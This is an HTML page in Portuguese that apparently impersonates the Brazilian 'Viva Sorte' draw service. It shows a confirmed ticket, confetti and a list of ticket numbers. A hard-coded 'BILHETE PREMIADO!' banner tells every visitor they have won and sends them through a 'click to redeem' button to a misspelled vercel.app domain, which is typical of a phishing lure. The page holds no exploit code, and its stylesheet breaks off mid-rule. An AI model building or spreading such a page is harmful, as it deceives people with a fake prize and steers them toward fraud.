<!doctype html>
<html lang="pt-BR">

<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Viva Sorte</title>
  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
  <link href="css/final.css?v=1234567" rel="stylesheet">
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Montserrat:ital,wght@0,100..900;1,100..900&display=swap" rel="stylesheet">
  <link href="https://fonts.googleapis.com/css2?family=Ubuntu:ital,wght@0,300;0,400;0,500;0,700;1,300;1,400;1,500;1,700&display=swap" rel="stylesheet">
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-rbsA2VBKQhggwzxH7pPCaAqO46MgnOM80zW1RWuH61DGLwZJEdK2Kadq2F9CUG65" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.3/font/bootstrap-icons.min.css">
</head>

<body>

<div class="topo">
  <img src="https://i.postimg.cc/9XxxDv2s/Logotipo-Viva-Sorte.png" alt="Logo">
</div>

<div class="container-principal">

  <!-- DESTAQUE TÍTULO PAGAMENTO -->
  <div class="pagamento d-flex align-items-center justify-content-between">
    <h1>Registro</h1>
    <img src="https://i.postimg.cc/5t6Pqgmn/boneco-pagamento.png" alt="Boneco Pagamento">
  </div>

<!--SCRIPT CONFETI-->
  <script src="https://www.napoleon.com.br/codigos/confetti.min.js"></script>
  <script>confetti.start()</script>
  <script>setTimeout(function(){confetti.stop();},3000)</script>
  
  <!-- PEDIDO CONFIRMADO -->
  <div class="pedido-confirmado d-flex flex-column justify-content-center align-items-center text-center">
    <i class="bi bi-check-circle"></i>
    <h1>Bilhete Registrado com Sucesso</h1>
    <script>
      var dataHora = new Date();
      var hora = dataHora.getHours();
      var minutos = dataHora.getMinutes();
      var dia = dataHora.getDate();
      var mes = dataHora.getMonth() + 1; // O mês começa em zero, então adicionamos 1 para ajustar

      // Adicionando zero à esquerda para minutos menores que 10
      if (minutos < 10) {
        minutos = "0" + minutos;
      }

      // Adicionando zero à esquerda para horas e dias menores que 10
      if (hora < 10) {
        hora = "0" + hora;
      }
      if (dia < 10) {
        dia = "0" + dia;
      }

      
    </script>
  </div>

  <!-- BILHETES-->
  <h1 class="bilhetes">Você irá concorrer com esses números abaixo, boa sorte!</h1>

  <div class="bilhetes-premiado text-center">
    <div class="bilhetes-one-premiado">
      <div class="bilhetes-one-premiado-body">
        <div class="flex-blihetes-one-premiado d-flex align-items-center">
          <i class="bi bi-check-circle"></i>
          <div class="bilhetes-one-titulo-n">
            <h1>Título nº <span>8541256</span></h1>
            <h2>BILHETE PREMIADO!</h2>
          </div>
          <a href="https://vivasorteoficiall-atendimento.vercel.app/">
            <button type="button" class="adc-carrinho-premiado">
              <i class="bi bi-trophy-fill"></i> CLIQUE PARA RESGATAR
            </button>
          </a>
        </div>
      </div>
    </div>
  </div>

  <div class="bilhetes text-center">
    <div class="bilhetes-one">
      <div class="bilhetes-one-countdown d-flex justify-content-between align-items-center">
        <div class="d-flex justify-content-center align-items-center" style="width: 40%;">Sorteio em</div>
        <span>5 dias</span>
      </div>
      <div class="bilhetes-one-body d-flex justify-content-start align-items-center">
        <i class="bi bi-check-circle"></i>
        <div class="d-flex flex-column align-items-start justify-content-start">
          <h1>Título nº <span>4856278</span></h1>
          <h2>DOM., 02 DE JUN. DE 2024<br>EDIÇÃO: 053</h2>
        </div>
      </div>
    </div>
  </div>

  <!-- Repita o bloco de bilhetes para cada número -->
  <div class="bilhetes text-center">
    <div class="bilhetes-one">
      <div class="bilhetes-one-countdown d-flex justify-content-between align-items-center">
        <div class="d-flex justify-content-center align-items-center" style="width: 40%;">Sorteio em</div>
        <span>5 dias</span>
      </div>
      <div class="bilhetes-one-body d-flex justify-content-start align-items-center">
        <i class="bi bi-check-circle"></i>
        <div class="d-flex flex-column align-items-start justify-content-start">
          <h1>Título nº <span>1486709</span></h1>
          <h2>DOM., 02 DE JUN. DE 2024<br>EDIÇÃO: 053</h2>
        </div>
      </div>
    </div>
  </div>
  <div class="bilhetes text-center">
    <div class="bilhetes-one">
      <div class="bilhetes-one-countdown d-flex justify-content-between align-items-center">
        <div class="d-flex justify-content-center align-items-center" style="width: 40%;">Sorteio em</div>
        <span>5 dias</span>
      </div>
      <div class="bilhetes-one-body d-flex justify-content-start align-items-center">
        <i class="bi bi-check-circle"></i>
        <div class="d-flex flex-column align-items-start justify-content-start">
          <h1>Título nº <span>8514967</span></h1>
          <h2>DOM., 02 DE JUN. DE 2024<br>EDIÇÃO: 053</h2>
        </div>
      </div>
    </div>
  </div>  <div class="bilhetes text-center">
    <div class="bilhetes-one">
      <div class="bilhetes-one-countdown d-flex justify-content-between align-items-center">
        <div class="d-flex justify-content-center align-items-center" style="width: 40%;">Sorteio em</div>
        <span>5 dias</span>
      </div>
      <div class="bilhetes-one-body d-flex justify-content-start align-items-center">
        <i class="bi bi-check-circle"></i>
        <div class="d-flex flex-column align-items-start justify-content-start">
          <h1>Título nº <span>598426</span></h1>
          <h2>DOM., 02 DE JUN. DE 2024<br>EDIÇÃO: 053</h2>
        </div>
      </div>
    </div>
  </div>
  <div class="bilhetes text-center">
    <div class="bilhetes-one">
      <div class="bilhetes-one-countdown d-flex justify-content-between align-items-center">
        <div class="d-flex justify-content-center align-items-center" style="width: 40%;">Sorteio em</div>
        <span>5 dias</span>
      </div>
      <div class="bilhetes-one-body d-flex justify-content-start align-items-center">
        <i class="bi bi-check-circle"></i>
        <div class="d-flex flex-column align-items-start justify-content-start">
          <h1>Título nº <span>1486709</span></h1>
          <h2>DOM., 02 DE JUN. DE 2024<br>EDIÇÃO: 053</h2>
        </div>
      </div>
    </div>
  </div>
  <div class="bilhetes text-center">
    <div class="bilhetes-one">
      <div class="bilhetes-one-countdown d-flex justify-content-between align-items-center">
        <div class="d-flex justify-content-center align-items-center" style="width: 40%;">Sorteio em</div>
        <span>5 dias</span>
      </div>
      <div class="bilhetes-one-body d-flex justify-content-start align-items-center">
        <i class="bi bi-check-circle"></i>
        <div class="d-flex flex-column align-items-start justify-content-start">
          <h1>Título nº <span>8514967</span></h1>
          <h2>DOM., 02 DE JUN. DE 2024<br>EDIÇÃO: 053</h2>
        </div>
      </div>
    </div>
  </div>  <div class="bilhetes text-center">
    <div class="bilhetes-one">
      <div class="bilhetes-one-countdown d-flex justify-content-between align-items-center">
        <div class="d-flex justify-content-center align-items-center" style="width: 40%;">Sorteio em</div>
        <span>5 dias</span>
      </div>
      <div class="bilhetes-one-body d-flex justify-content-start align-items-center">
        <i class="bi bi-check-circle"></i>
        <div class="d-flex flex-column align-items-start justify-content-start">
          <h1>Título nº <span>598426</span></h1>
          <h2>DOM., 02 DE JUN. DE 2024<br>EDIÇÃO: 053</h2>
        </div>
      </div>
    </div>
  </div>
  <!-- Continue com os outros bilhetes da mesma maneira -->

</div>

<div class="container-principal d-flex justify-content-center">
    <button type="button" class="adc-carrinho-carregar" onclick="window.location.href='https://vivasorteoficialaten.vercel.app/'">
        <i class="bi bi-arrow-clockwise"></i> CARREGAR MAIS
      </button>
      
  <style>
    body {
    /*    font-family: "Montserrat", sans-serif !important;   */
    font-family: "Ubuntu", sans-serif !important;
}

.container-principal {
    margin: 0 auto;
    width: 700px;
    max-width: 100%;
    padding: 0px 10px;
}

/* DESTAQUE TÍTULO PAGAMENTO */
.pagamento {
    margin-top: -3px;
    font-family: "Ubuntu", sans-serif;
    padding: 0rem 0rem 0rem 1.5rem;
    border-radius: 0.6rem;
    color: white;
    background: rgb(47, 78, 181);
    background: -moz-linear-gradient(90deg, rgba(47, 78, 181, 1) 54%, rgba(105, 123, 232, 1) 100%);
    background: -webkit-linear-gradient(90deg, rgba(47, 78, 181, 1) 54%, rgba(105, 123, 232, 1) 100%);
    background: linear-gradient(90deg, rgba(47, 78, 181, 1) 54%, rgba(105, 123, 232, 1) 100%);
    filter: progid:DXImageTransform.Microsoft.gradient(startColorstr="#2f4eb5", endColorstr="#697be8", GradientType=1);
}

.pagamento h1 {
    margin-top: 5px;
    font-size: 1.5rem;
    font-weight: 600;
    line-height: 0em;
}

.pagamento img {
    margin-top: -8px;
    margin-right: 0px;
    width: auto;
}

/* PEDIDO CONFIRMADO */
.pedido-confirmado {
    margin-top: 5px;
}

.pedido-confirmado i {
    font-size: 3rem;
    color: #369c11;
}

.pedido-confirmado h1 {
    margin-top: -8px;
    color: #369c11;
    font-size: 1.5rem;
    font-weight: 700;
}

.pedido-confirmado h3 {
    margin-top: -4px;
    color: #64748b;
    font-size: 0.9rem;
    font-weight: 500;
}

.pedido-confirmado h2 {
    margin-top: 0px;
    color: black;
    font-size: 1.1rem;
    font-weight: 500;
}

/* BILHETES */
.resumo-compra {
    margin-top: 25px !important;
}

.resumo-compra-header {
    width: 100%;
    display: flex;
    align-items: center;
    justify-content: center;
}

.resumo-compra-header-text {
    width: 20%;
    color: white;
}

.resumo-compra-header-text h1 {
    font-size: 1rem;
    font-weight: 600;
}

.resumo-compra-header-text h2 {
    font-size: 0.8rem;
}

.resumo-compra-header-valor {
    width: 70%;
    display: flex;
    align-items: center;
    justify-content: center;
    background-color: white;
    color: #2f4eb5;
    font-size: 1.2rem;
    font-weight: 600;
    padding: 0.5rem 6rem;
    margin: 0rem 3rem 0rem 2rem !important;
    border-radius: 0.32rem;
}

.accordion-button {
    background-color: #2f4eb5 !important;
}

.accordion-button::after {
    display: none !important;
}

.resumo-compra-header-btn {
    width: 10%;
    display: flex !important;
    justify-content: end !important;
    align-items: end !important;
}

.resumo-compra-header-btn span {
    color: #2f4eb5;
    background-color: white;
    padding: 0.5rem;
    line-height: 0;
    font-size: 1.2rem;
    width: 35px !important;
    height: 35px !important;
    border-radius: 50%;
}

.resumo-compra-header-btn span.active {
    background-color: #2f4eb5;
    color: white;
    transform: rotate(180deg);
}

.resumo-compra-table {
    padding: 0.7rem 0rem;
    border-bottom: #d1d1d1 1px solid;
}

.resumo-compra-table h1 {
    color: #2f4eb5;
    font-weight: 500;
    font-size: 0.9rem;
    display: flex;
    align-items: center;
    justify-content: start !important;
    width: 50%;
}

.resumo-compra-table h2 {
    color: #2f4eb5;
    font-weight: 600;
    font-size: 1rem;
    display: flex;
    align-items: center;
    justify-content: end !important;
    width: 50%;
}

.resumo-compra-table.active {
    margin: 0.5rem 0rem !important;
    background-color: #2f4eb5;
    color: white !important;
    border-radius: 0.6rem;
    padding: 0.7rem 1rem;
    border-bottom: #d1d1d1 1px solid;
}

.resumo-compra-table.active h1 {
    color: white !important;
}

.resumo-compra-table.active h2 {
    color: white !important;
}

/* BILHETES */
.bilhetes {
    margin-top: 15px;
}

H1.bilhetes {
    text-align: center;
    color: #64748b;
    font-size: 1.1rem;
    font-weight: 400;
}

.bilhetes-one {
    position: relative;
    margin-top: 35px;
    width: 100%;
    background-color: #f4f6fb;
    border: 1px solid black;
    border-radius: 0.6rem;
    padding: 1rem;
}

.bilhetes-one-countdown {
    position: absolute;
    top: -1.2rem;
    right: 0.6rem;
    color: white;
    font-size: 0.8rem;
    background-color: #ff3a17;
    width: 50%;
    padding: 0.35rem 0.6rem;
    border-radius: 0.7rem;
}

.bilhetes-one-countdown span {
    background-color: #ff6145;
    width: 60%;
    padding: 0.2rem 1rem;
    border-radius: 0.4rem;
}

.bilhetes-one-body i {
    font-size: 1.25rem;
    color: #6b7280;
    margin-right: 1rem;
}

.bilhetes-one-body h1 {
    margin-top: 0px;
    color: black;
    font-size: 1.2rem;
    font-weight: 700;
}

.bilhetes-one-body span {
    margin-top: 0px;
    color: #6b7280;
    font-size: 1.2rem;
    font-weight: 400;
}

.bilhetes-one-body h2 {
    text-align: left;
    margin-top: -14px;
    color: #2f4eb5;
    font-size: 1.05rem;
    font-weight: 600;
    line-height: 1.3em;
}


/* BILHETES PREMIADO */

.bilhetes-one-premiado-body {
    display: flex !important;
    justify-content: space-between !important;
    align-items: center !important;
}

.bilhetes-one-titulo-n {
    display: flex !important;
    justify-content: start !important;
    align-items: start !important;
    flex-direction: column;
}

.bilhetes-premiado {
    margin-top: 40px;
}

.bilhetes-premiado a {
    width: 100%;
}

.bilhetes-one-premiado {
    position: relative;
    margin-top: 35px;
    width: 100%;
    background-color: #52b52f;
    border: 1px solid #93ff6b;
    border-radius: 0.6rem;
    padding: 2rem 1rem;
}

.bilhetes-one-premiado-body i {
    font-size: 1.25rem;
    color: white;
    margin-right: 1rem;
}

.bilhetes-one-premiado-body h1 {
    margin-top: 0px;
    color: white;
    font-size: 1.2rem;
    font-weight: 700;
}

.bilhetes-one-premiado-body span {
    margin-top: 0px;
    color: white;
    font-size: 1.2rem;
    font-weight: 400;
}

.bilhetes-one-premiado-body h2 {
    text-align: left;
    margin-top: -4px;
    color: white;
    font-size: 1.8rem;
    font-weight: 600;
    line-height: 1em;
}


/* BOTÃO */
button.adc-carrinho {
    font-size: 1.2rem;
    font-weight: 600;
    color: white;
    background-color: #52b52f;
    border: none;
    border-radius: 0.6rem;
    width: 100%;
    padding: 0.8rem 0rem;
    margin-top: 20px !important;
    margin-bottom: 35px;
    animation: pulse 2s infinite;
}

button.adc-carrinho a {
    color: white !important;
    text-decoration: none;
}


button.adc-carrinho:disabled {
    opacity: 0.6;
}

button.adc-carrinho:hover {
    background-color: #0f8400;
}

button.adc-carrinho i {
    font-size: 1.5rem;
    vertical-align: -0.1rem;
    margin-right: 1rem;
}

.botao a {
    width: 100% !important;
    text-align: center;
}

/* BOTÃO PREMIADO */
button.adc-carrinho-premiado {
    font-size: 1.2rem;
    font-weight: 600;
    color: white;
    background-color: #2f4eb5;
    border: none;
    border-radius: 0.6rem;
    width: 90%;
    padding: 0.8rem 0.5rem;
    margin-top: 20px !important;
    margin-left: 1.1rem;
    margin-bottom: 35px;
    animation: pulse 2s infinite;
}

button.adc-carrinho-premiado a {
    color: white !important;
    text-decoration: none;
}

button.adc-carrinho-premiado:hover {
    background-color: rgb(0, 47, 202);
}

button.adc-carrinho-premiado i {
    font-size: 1.5rem;
    vertical-align: -0.1rem;
    margin-right: 1rem;
}

.botao a {
    width: 100% !important;
    text-align: center;
}


@keyframes pulse {
    0% {
        transform: scale(1);
    }

    50% {
        transform: scale(1.1);
    }

    100% {
        transform: scale(1);
    }
}


/* BOTÃO CARREGAR MAIS */
button.adc-carrinho-carregar {
    font-size: 1.2rem;
    font-weight: 600;
    color: white;
    background-color: #2f4eb5;
    border: none;
    border-radius: 0.6rem;
    width: 90%;
    padding: 0.8rem 0.5rem;
    margin-top: 20px !important;
    margin-left: 0;
    margin-bottom: 35px;
}

button.adc-carrinho-carregar a {
    color: white !important;
    text-decoration: none;
}

button.adc-carrinho-carregar:hover {
    background-color: rgb(0, 47, 202);
}

button.adc-carrinho-carregar i {
    font-size: 1.5rem;
    vertical-align: -0.1rem;
    margin-right: 1rem;
}

.botao a {
    width: 100% !important;
    text-align: center;
}


@media (max-width: 575.98px) {
    .resumo-compra {
        margin-top: 5px !important;
    }

    .resumo-compra-header {
        width: 100%;
    }

    .resumo-compra-header-text {
        gap: 0px;
        width: 20%;
        color: white;
    }

    .resumo-compra-header-text h1 {
        margin-top: 5px;
        margin-bottom: 2px !important;
        font-size: 0.7em;
        font-weight: 600;
        line-height: 1;
    }

    .resumo-compra-header-text h2 {
        font-size: 0.6rem;
        line-height: 1;
    }

    .resumo-compra-header-valor {
        width: 45%;
        font-size: 1.0rem;
        padding: 0.5rem 1rem;
        margin: 0rem 2rem 0rem 2rem !important;
        border-radius: 0.32rem;
    }

    .resumo-compra-header-btn {
        width: 10%;
    }

    .resumo-compra-header-btn span {
        padding: 0.3rem;
        line-height: 0;
        font-size: 1rem;
        width: 25px !important;
        height: 25px !important;
        border-radius: 50%;
    }

    .resumo-compra-table {
        padding: 0.5rem 0rem 0rem 0rem;
        border-bottom: #d1d1d1 1px solid;
    }

    .resumo-compra-table h1 {
        margin-top: 5px !important;
        font-size: 0.9rem;
        width: 50%;
    }

    .resumo-compra-table h2 {
        margin-top: 5px !important;
        font-size: 1rem;
        width: 50%;
    }

    .resumo-compra-table.active {
        margin: 0.5rem 0rem !important;
        background-color: #2f4eb5;
        color: white !important;
        border-radius: 0.6rem;
        padding: 0.7rem 1rem;
        border-bottom: #d1d1d1 1px solid;
    }

    .resumo-compra-table.active h1 {
        color: white !important;
    }

    .resumo-compra-table.active h2 {
        color: white !important;
    }

    /* BILHETES */
    .bilhetes-one {
        padding: 2.1rem 1rem;
    }

    .bilhetes-one-countdown {
        width: 60%;
    }


    /* BILHETES PREMIADO */
    .bilhetes-one-titulo-n {
        display: flex !important;
        flex-direction: column !important;
        justify-content: center !important;
        align-items: center !important;
    } 

    .bilhetes-one-premiado-body {
        display: flex !important;
        justify-content: center !important;
        align-items: center !important;
    }

    .flex-blihetes-one-premiado {
        display: flex !important;
        flex-direction: column !important;
    }

    .bilhetes-premiado {
        margin-top: 15px;
    }

    .bilhetes-premiado a {
        width: 100%;
    }

    .bilhetes-one-premiado {
        position: relative;
        margin-top: 5px;
        width: 100%;
        background-color: #52b52f;
        border: 1px solid #93ff6b;
        border-radius: 0.6rem;
        padding: 1.5rem 0rem 0.4rem 0rem;
    }


    .bilhetes-one-premiado-body i {
        font-size: 2rem;
        color: white;
        margin-right: 1rem;
    }

    .bilhetes-one-premiado-body h1 {
        text-align: center;
        margin-top: 20px;
        color: white;
        font-size: 1.5rem;
        font-weight: 700;
    }

    .bilhetes-one-premiado-body span {
        text-align: center;

        margin-top: 0px;
        color: white;
        font-size: 1.5rem;
        font-weight: 400;
    }

    .bilhetes-one-premiado-body h2 {
        text-align: center;
        margin-top: -5px;
        color: white;
        font-size: 1.5rem;
        font-weight: 600;
        line-height: 1em;
    }

    /* BOTÃO PREMIADO */
    button.adc-carrinho-premiado {
        font-size: 1.1rem;
        font-weight: 600;
        color: white;
        background-color: #2f4eb5;
        border: none;
        border-radius: 0.6rem;
        width: 100% !important;
        padding: 0.8rem 1.5rem;
        margin-top: 20px !important;
        margin-left: 0px;
        margin-bottom: 35px;
        animation: pulse 2s infinite;
    }

    button.adc-carrinho-premiado a {
        color: white !important;
        text-decoration: none;
    }

    button.adc-carrinho-premiado:hover {
        background-color: rgb(0, 47, 202);
    }

    button.adc-carrinho-premiado i {
        font-size: 1.5rem;
        vertical-align: -0.1rem;
        margin-right: 1rem;
    }

    .botao a {
        width: 100% !important;
        text-align: center;
    }



}

button.adc-final {
    font-size: 0.9rem;
    font-weight: 600;
    color: white;
    background-color: #52b52f;
    border: none;
    border-radius: 0.4rem;
    width: 100%;
    padding: 0.8rem 1rem;
    margin-top: 20px !important;
    margin-left: 0rem;
    margin-bottom: 35px;
}

button.adc-final a {
    color: white !important;
    text-decoration: none;
}

button.adc-final:hover {
    background-color: #3d8b20;}

button.adc-final i {
    font-size: 1.5rem;
    vertical-align: -0.1rem;
    margin-right: 1rem;
}

.botao a {
    width: 100% !important;
    text-align: center;
}


body {
    font-family: "Montserrat", sans-serif !important;
}

.container-principal {
    margin: 0 auto;
    width: 700px;
    max-width: 100%;
    padding: 10px;
}

.tag-compre-agora {
    position: absolute;
    top: 0.8rem;
    right: 0.8rem;
    animation: pulse 2s infinite;
}

.tag-compre-agora span {
    color: white;
    font-size: .75rem;
    background-color: #52b52f;
    border-radius: 0.2rem;
    padding: 0.4rem;
    -webkit-box-shadow: 0px 0px 10px 5px rgba(0, 0, 0, 0.16);
    -moz-box-shadow: 0px 0px 10px 5px rgba(0, 0, 0, 0.16);
    box-shadow: 0px 0px 10px 5px rgba(0, 0, 0, 0.16);

}

@keyframes pulse {
    0% {
        transform: scale(1);
    }

    50% {
        transform: scale(1.1);
    }

    100% {
        transform: scale(1);
    }
}

.infos-sorteio {
    position: absolute;
    bottom: 0;
    display: flex;
    justify-content: center;
    align-items: center;
    background: rgb(0, 0, 0);
    background: -moz-linear-gradient(0deg, rgba(0, 0, 0, 1) 9%, rgba(0, 0, 0, 0) 100%);
    background: -webkit-linear-gradient(0deg, rgba(0, 0, 0, 1) 9%, rgba(0, 0, 0, 0) 100%);
    background: linear-gradient(0deg, rgba(0, 0, 0, 1) 9%, rgba(0, 0, 0, 0) 100%);
    filter: progid:DXImageTransform.Microsoft.gradient(startColorstr="#000000", endColorstr="#000000", GradientType=1);
    width: 100%;
    height: 80px;
    border-radius: 0.8rem !important;

}

.infos-sorteio h1 {
    margin: 0rem 0.5rem !important;
    color: white;
    font-size: 0.9rem;
}

.infos-sorteio span {
    margin: 0 !important;
    color: black;
    font-size: 0.9rem;
    font-weight: 600;
    background-color: #ffffff;
    border-radius: 0.2rem;
    padding: 0.4rem;
    line-height: 1rem;
    -webkit-box-shadow: 0px 0px 10px 5px rgba(0, 0, 0, 0.16);
    -moz-box-shadow: 0px 0px 10px 5px rgba(0, 0, 0, 0.16);
    box-shadow: 0px 0px 10px 5px rgba(0, 0, 0, 0.16);
}

.carousel-item img {
    border-radius: 0.8rem !important;
}

.cotas {
    margin-top: -10px !important;
    display: flex;
    justify-content: center;
    align-items: center;
    flex-direction: column;
    padding: 0.9rem 0rem;
}

.cotas h3 {
    text-align: center;
    color: black;
    font-size: 1rem;
    font-weight: 400;
}

.cotas-one {
    margin-top: 1rem !important;
    width: 100%;
    display: flex;
    justify-content: center;
    align-items: center;
}

button.cota {
    position: relative;
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    width: 30%;
    color: black;
    background-color: white;
    border: none;
    padding: 1rem;
    border-radius: 0.6rem;
    border: solid rgba(128, 128, 128, 0.137) 1px;
    -webkit-box-shadow: 0px 12px 16px -13px rgba(0, 0, 0, 0.47);
    -moz-box-shadow: 0px 12px 16px -13px rgba(0, 0, 0, 0.47);
    box-shadow: 0px 12px 16px -13px rgba(0, 0, 0, 0.47);
}

button.cota a {
    color: black !important;
}

button.cota a:focus {
    color: white !important;
}

button.cota:hover {
    background-color: #52b52f;
}

button.cota:focus {
    background-color: #0f8400;
}

.cota-selected {
    background-color: #0f8400 !important;
    color: white !important;
}

.cota-qtd {
    font-size: 2rem;
    font-weight: 700;
}

.cota h1 {
    margin: 0.3rem 0rem !important;
    font-size: 1rem;
    font-weight: 400;
}

.cota h2 {
    margin: 0.8rem 0rem !important;
    font-size: 0.9rem;
    font-weight: 400;
}

i.destaque {
    background-color: #52b52f;
    position: absolute;
    top: 0;
    right: 0;
    padding: 0.2rem 0.5rem;
    border-radius: 0.6rem;
}

.contador-cotas {
    margin-top: 30px !important;
    display: flex;
    padding: 0.8rem 10rem;
    background-color: #2f4eb5 !important;
    border-radius: 0.6rem;
}



button.btn-contador-cotas {
    height: 45px;
    width: 45px;
    font-size: 1.8rem;
    color: white;
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    background-color: transparent;
    border: none;
    padding: 0.5rem 1rem;
    border-radius: 50%;
    border: solid white 2px;
}

input.input-contador-cotas {
    text-align: center;
    margin: 0rem 1rem !important;
    padding: 0.5rem 1.2rem;
    color: black;
    border: none;
    border: none;
    border-radius: 0.6rem;
}

.pgto-concluido-header {
    text-align: center;
}
.pgto-concluido-header i {
    color: green;
    font-size: 4rem;
}

.pgto-concluido-header h1 {
    color: green;
    font-size: 1.4rem;
    font-weight: 500;
}

.pgto-concluido-header h2 {
    margin-top: 15px;
    margin-bottom: 50px;
    color: grey;
    font-size: 1.1rem;
    line-height: 1em;
    font-weight: 400;
}


button a {
    color: white;
    text-decoration: none !important;
}

a {
    color: white;
    text-decoration: none !important;
}

button.adc-carrinho {
    font-size: 1.2rem;
    font-weight: 600;
    color: white;
    background-color: #52b52f;
    border: none;
    border-radius: 0.6rem;
    width: 100%;
    padding: 0.8rem 0rem;
    margin-top: 10px !important;
}

button.adc-carrinho a {
    color: white !important;
    text-decoration: none;
}


button.adc-carrinho:disabled {
    opacity: 0.6;
}

button.adc-carrinho:hover {
    font-size: 1.2rem;
    font-weight: 600;
    color: white;
    background-color: #0f8400;
    border: none;
    border-radius: 0.6rem;
    width: 100%;
    padding: 0.8rem 0rem;
    margin-top: 10px !important;
}


button.adc-carrinho i {
    font-size: 1.5rem;
    vertical-align: -0.1rem;
}

.resumo-compra {
    margin-top: 30px !important;
}

.resumo-compra-header {
    width: 100%;
    display: flex;
    align-items: center;
    justify-content: center;
}

.resumo-compra-header-text {
    width: 20%;
    color: white;
}

.resumo-compra-header-text h1 {
    font-size: 1rem;
    font-weight: 600;
}

.resumo-compra-header-text h2 {
    font-size: 0.8rem;
}

.resumo-compra-header-valor {
    width: 70%;
    display: flex;
    align-items: center;
    justify-content: center;
    background-color: white;
    color: #2f4eb5;
    font-size: 1.2rem;
    font-weight: 600;
    padding: 0.5rem 6rem;
    margin: 0rem 3rem 0rem 2rem !important;
    border-radius: 0.32rem;
}

.accordion-button {
    background-color: #2f4eb5 !important;
}

.accordion-button::after {
    display: none !important;
}

.resumo-compra-header-btn {
    width: 10%;
    display: flex !important;
    justify-content: end !important;
    align-items: end !important;
}

.resumo-compra-header-btn span {
    color: #2f4eb5;
    background-color: white;
    padding: 0.5rem;
    line-height: 0;
    font-size: 1.2rem;
    width: 35px !important;
    height: 35px !important;
    border-radius: 50%;
}

.resumo-compra-header-btn span.active {
    background-color: #2f4eb5;
    color: white;
    transform: rotate(180deg);
}

.resumo-compra-table {
    padding: 0.7rem 0rem;
    border-bottom: #d1d1d1 1px solid;
}

.resumo-compra-table h1 {
    color: #2f4eb5;
    font-weight: 500;
    font-size: 0.9rem;
    display: flex;
    align-items: center;
    justify-content: start !important;
    width: 50%;
}

.resumo-compra-table h2 {
    color: #2f4eb5;
    font-weight: 600;
    font-size: 1rem;
    display: flex;
    align-items: center;
    justify-content: end !important;
    width: 50%;
}

.resumo-compra-table.active {
    margin: 0.5rem 0rem !important;
    background-color: #2f4eb5;
    color: white !important;
    border-radius: 0.6rem;
    padding: 0.7rem 1rem;
    border-bottom: #d1d1d1 1px solid;
}

.resumo-compra-table.active h1 {
    color: white !important;
}

.resumo-compra-table.active h2 {
    color: white !important;
}


input.dados-form-input {
    color: black;
    font-size: 1.1rem;
    border-radius: 0.375rem;
    background-color: white;
    border: 2px solid rgb(224, 224, 224);
    width: 100%;
    padding: 1rem;
    margin: 0.5rem 0rem !important;
}

input.dados-form-input:focus {
    background-color: #f8fafc;
    border: 2px solid rgb(224, 224, 224);
}

.dados-form {
    padding: 1rem 0rem;
}


.area-pgto {
    font-family: "Montserrat", sans-serif;
    font-weight: 500;
    color: white;
    font-size: 15px;
    text-align: center;
    width: 100%;
    display: flex;
}

.qr-code-img {
    display: flex;
    flex-direction: column;
    align-items: center;
    justify-content: center;
    width: 45% !important;
    padding: 1rem;
}

.qr-code-img-novo {
    width: 100% !important;
    padding: 0rem;
    margin-bottom: 10px;
}

.area-pgto img {
    width: 100% !important;
    object-fit: contain !important;
}

#codigo-pix-container h1 {
    color: white;
    font-size: 15px;
}

.pix-code {
    display: flex;
    flex-direction: column;
    align-items: center;
    justify-content: center;
    overflow: hidden;
    width: 55%;
    padding: 1rem;
}

#codigo-pix {
    width: 100%;
    overflow: hidden;
    color: black !important;
    background-color: #f1f5f9;
    color: #a0a3b8 !important;
    padding: 1rem;
}

IMG.img-pix {
    border-radius: 0.5rem;
    margin-top: 0px;
    margin-bottom: 15px;
}


.rodape {
    margin-top: 100px !important;
    padding: 1.5rem 0.5rem;
    background-color: #fafafa;
}

IMG.logo-rodape {
    width: 250px;
    max-width: 40%;
}

.redes {
    margin: 1.5rem 0rem !important;
}

.redes i {
    color: #2f4eb5;
    font-size: 1.2rem;
    margin-right: 0.5rem !important;
}

.rodape h1 {
    font-size: 0.8rem;
    text-align: justify;
}

.linha-rodape {
    margin: 2rem 0rem !important;
    border-bottom: 4px solid #d1d5db;
}

.patterns-rodape {
    display: flex;
    font-size: 0.9rem;
    font-weight: 500;
}

.patterns-rodape {
    width: 100% !important;
    display: flex;
    justify-content: start !important;
    align-items: start !important;
    font-size: 0.7rem;
    font-weight: 500;
}

.pattern-rodape {
    display: flex;
    flex-direction: column;
    margin-bottom: 30px;
    margin-right: 35px !important;
}

.pattern-rodape img {
    width: 60%;
    height: auto;
    margin-top: 10px !important;
}

.resumo-pix {
    display: flex;
    justify-content: space-between;
    margin-top: 20px;
    background-color: #f1f5f9;
    padding: 2rem 1.5rem;
    border-radius: 0.6rem;
}

.resumo-pix h1 {
    color: #6B7280;
    font-size: 1rem;
    font-weight: 700;
}

.resumo-pix h2 {
    color: #6B7280;
    font-size: 1rem;
}

.resumo-pix-one {
    display: flex;
    flex-direction: column;
    align-items: end;
    justify-content: center;
    width: 50%;
    padding-top: 5px;
}

.resumo-pix-one-border {
    width: 50%;
    display: flex;
    flex-direction: column;
    align-items: start;
    justify-content: center;
    padding-right: 1rem;
    border-right: solid 1px #b1b6be;
}

.pix-info {
    display: flex;
    justify-content: space-between;
    align-items: center;
    margin-top: 30px;
}

.pix-info img {
    width: 30%;
    margin-right: 50px;
}

.pix-info h1 {
    color: #6B7280;
    font-weight: 400;
    font-size: 1rem;
    text-align: justify;
}

.como-pagar {
    background-color: #f1f5f9;
    color: #64748b;
    text-align: center;
    border-radius: 0.6rem;
    padding: 2rem 0.5rem;
    font-size: 1.5rem;
    font-weight: 700;
}

.como-pagar-one {
    padding: 1rem 3rem;
    display: flex;
    align-items: center;
    justify-content: start;
}

.como-pagar-one h1 {
    font-size: 0.9rem;
    font-weight: 400;
    text-align: justify;
}

.como-pagar-one img {
    width: 45px !important;
    margin-right: 1rem;
}

.infos-banner h1 {
    margin-top: 20px !important;
    font-size: 1.2rem !important;
    font-weight: 600 !important;
}

.infos-banner h2 {
